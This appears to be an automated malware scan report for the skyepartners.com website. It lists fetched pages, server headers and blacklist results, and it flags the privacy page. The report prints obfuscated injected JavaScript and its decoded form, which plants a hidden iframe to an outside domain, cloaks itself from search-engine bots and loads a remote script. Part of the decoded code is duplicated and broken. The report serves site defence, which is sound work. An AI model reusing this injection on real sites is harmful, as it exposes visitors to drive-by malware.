Scanned pages/files
| Request | Server response | Status |
http://skyepartners.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 15 Aug 2014 20:00:18 GMT Location: http://www.skyepartners.com/ Server: Apache/2.2.3 (Red Hat) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.skyepartners.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.skyepartners.com/ | 200 OK Content-Length: 6435 Content-Type: text/html | clean |
http://www.skyepartners.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://www.skyepartners.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.skyepartners.com/wp-content/themes/skye/js/jquery.main.js | 200 OK Content-Length: 22036 Content-Type: application/x-javascript | clean |
http://skyepartners.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 15 Aug 2014 20:00:27 GMT Pragma: no-cache Location: http://www.skyepartners.com/test404page.js Server: Apache/2.2.3 (Red Hat) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.skyepartners.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.skyepartners.com/test404page.js | 404 Not Found Content-Length: 14924 Content-Type: text/html | clean |
http://www.skyepartners.com/about-us | 200 OK Content-Length: 6048 Content-Type: text/html | clean |
http://www.skyepartners.com/the-team | 200 OK Content-Length: 7388 Content-Type: text/html | clean |
http://www.skyepartners.com/services | 200 OK Content-Length: 5586 Content-Type: text/html | clean |
http://www.skyepartners.com/category/projects | 200 OK Content-Length: 10500 Content-Type: text/html | clean |
http://www.skyepartners.com/ten9fifty | 200 OK Content-Length: 11184 Content-Type: text/html | clean |
http://www.skyepartners.com/the-lot | 200 OK Content-Length: 11855 Content-Type: text/html | clean |
http://www.skyepartners.com/contact | 200 OK Content-Length: 5110 Content-Type: text/html | clean |
http://www.skyepartners.com/privacy | 200 OK Content-Length: 11953 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var IOO='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpwGMshCZslGaDRmblBHch5yTsFzXKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPxWMfBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbwwmC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsBDbgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92 Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D1%20height%3D1%20frameborder%3D1%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var l0l = document.createElement('script'); l0l.src = 'http://a l0l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var _1lO = document.getElementsByTagName('head')[0]; _1lO.appendChild(l0l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.skyepartners.com/www.skyepartners.com/privacy | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 15 Aug 2014 20:00:46 GMT Pragma: no-cache Location: http://www.skyepartners.com/privacy Server: Apache/2.2.3 (Red Hat) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.skyepartners.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.skyepartners.com/category/ | 404 Not Found Content-Length: 14924 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skyepartners.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 15 Aug 2014 20:00:18 GMT
Location: http://www.skyepartners.com/
Server: Apache/2.2.3 (Red Hat)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.skyepartners.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: skyepartners.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 15 Aug 2014 20:00:18 GMT
Location: http://www.skyepartners.com/
Server: Apache/2.2.3 (Red Hat)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.skyepartners.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: skyepartners.com
Referer: http://www.google.com/search?q=skyepartners.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skyepartners.com
Referer: http://www.google.com/search?q=skyepartners.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skyepartners.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://skyepartners.com/
Result: skyepartners.com is not infected or malware details are not published yet.
Result: skyepartners.com is not infected or malware details are not published yet.